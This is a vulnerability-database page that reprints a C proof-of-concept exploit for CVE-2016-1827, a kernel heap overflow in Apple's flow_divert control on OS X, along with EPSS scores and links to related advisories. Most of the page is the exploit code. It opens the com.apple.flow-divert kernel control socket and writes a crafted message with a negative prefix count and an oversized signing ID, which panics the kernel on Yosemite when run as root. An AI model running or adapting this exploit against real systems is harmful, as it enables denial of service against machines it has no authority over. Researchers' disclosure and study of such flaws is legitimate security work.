Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtBrandon Azad1337DAY-ID-29932
HistoryMar 03, 2018 - 12:00 a.m.

Apple OS X Yosemite - flow_divert-heap-overflow Kernel Panic Exploit

2018-03-0300:00:00
Brandon Azad
0day.today
40

0.002 Low

EPSS

Percentile

62.4%

JSON

Exploit for macOS platform in category dos / poc

/*
 * flow_divert-heap-overflow.c
 * Brandon Azad
 *
 * CVE-2016-1827: Kernel heap overflow in the function flow_divert_handle_app_map_create on OS X
 * and iOS. Exploitation requires root privileges. The vulnerability was patched in OS X El Capitan
 * 10.11.5 and iOS 9.3.2.
 *
 * This proof-of-concept triggers a kernel panic on OS X Yosemite. In El Capitan the length fields
 * were changed from 64 bits to 32 bits, so the message structure will need to be updated
 * accordingly. This exploit has not been tested on iOS.
 * 
 * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44238.zip
 */
 
#include <net/if.h>
#include <string.h>
#include <sys/sys_domain.h>
#include <sys/kern_control.h>
#include <sys/ioctl.h>
#include <unistd.h>
 
int main() {
    int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
    if (ctlfd == -1) {
        return 1;
    }
    struct ctl_info info = { .ctl_id = 0 };
    strncpy(info.ctl_name, "com.apple.flow-divert", sizeof(info.ctl_name));
    int err = ioctl(ctlfd, CTLIOCGINFO, &info);
    if (err) {
        return 2;
    }
    struct sockaddr_ctl addr = {
        .sc_len     = sizeof(addr),
        .sc_family  = AF_SYSTEM,
        .ss_sysaddr = AF_SYS_CONTROL,
    };
    addr.sc_id = info.ctl_id;
    addr.sc_unit = 0;
    err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
    if (err) {
        return 3;
    }
    struct __attribute__((packed)) {
        uint8_t  type;
        uint8_t  pad1[3];
        uint32_t conn_id;
        uint8_t  prefix_count_tag;
        uint64_t prefix_count_length;
        int      prefix_count;
        uint8_t  signing_id_tag;
        uint64_t signing_id_length;
        uint8_t  signing_id[512 + 4];
    } message = {
        .type                = 9,
        .conn_id             = htonl(0),
        .prefix_count_tag    = 28,
        .prefix_count_length = htonl(sizeof(int)),
        .prefix_count        = -2,
        .signing_id_tag      = 25,
        .signing_id_length   = htonl(sizeof(message.signing_id)),
        .signing_id          = { 0xaa },
    };
    write(ctlfd, &message, sizeof(message));
    close(ctlfd);
    return 4;
}

#  0day.today [2018-04-12]  #

Related

exploitpack 1
exploitdb 1
prion 4
cve 4
apple 8
nessus 3
openvas 1
exploitpack
exploitpack
Apple OS X Yosemite - flow_divert-heap-overflow Kernel Panic
2017-01-10 00:00:00
exploitdb
exploitdb
Apple OS X Yosemite - &#039;flow_divert-heap-overflow&#039; Kernel Panic
2017-01-10 00:00:00
prion
prion
Memory corruption
2016-05-20 10:59:00
Memory corruption
2016-05-20 10:59:00
Memory corruption
2016-05-20 10:59:00
cve
cve
CVE-2016-1829
2016-05-20 10:59:00
CVE-2016-1828
2016-05-20 10:59:00
CVE-2016-1827
2016-05-20 10:59:00
apple
apple
About the security content of watchOS 2.2.1
2016-05-16 00:00:00
About the security content of watchOS 2.2.1 - Apple Support
2017-01-23 03:54:39
About the security content of tvOS 9.2.1 - Apple Support
2017-01-23 03:54:40
nessus
nessus
Apple TV < 9.2.1 Multiple Vulnerabilities
2016-05-24 00:00:00
macOS < 10.11.5 Multiple Vulnerabilities
2016-08-23 00:00:00
Mac OS X 10.11.x < 10.11.5 Multiple Vulnerabilities
2016-05-19 00:00:00
openvas
openvas
Apple Mac OS X Multiple Vulnerabilities-01 (Nov 2016)
2016-11-22 00:00:00

0.002 Low

EPSS

Percentile

62.4%

JSON
Related for 1337DAY-ID-29932
exploitpack1exploitdb1prion4cve4apple8nessus3openvas1